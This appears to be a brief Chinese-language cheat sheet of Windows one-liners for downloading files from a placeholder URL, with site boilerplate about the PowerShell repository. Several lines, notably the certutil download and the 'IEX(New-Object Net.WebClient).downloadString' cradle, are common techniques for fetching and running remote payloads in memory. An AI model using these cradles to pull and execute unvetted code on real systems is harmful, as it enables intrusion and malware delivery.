1
Powershell:

1.
wget http://URL/FileName -Outfile Save-As-FileName

2.
IEX(New-Object Net.WebClient).downloadString('http://URL/FileName')

2
CMD/Powershell:

certutil -urlcache -split -f http://URL/FileName Save-As-FileName

3
Powershell:

iwr http://URL/FileName -OutFile Save-As-FileName

4
CMD 执行powershell命令

powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://URL/FileName')"
GitHub 加速计划 / po / PowerShell
44.28 K
7.17 K
下载
PowerShell/PowerShell: PowerShell 是由微软开发的命令行外壳程序和脚本环境,支持任务自动化和配置管理。它包含了丰富的.NET框架功能,适用于Windows和多个非Windows平台,提供了一种强大而灵活的方式来控制和自动执行系统管理任务。
最近提交(Master分支:2 个月前 )
a1774fd9 3 个月前
5ad1f1d2 3 个月前
Logo

旨在为数千万中国开发者提供一个无缝且高效的云端环境,以支持学习、使用和贡献开源项目。

更多推荐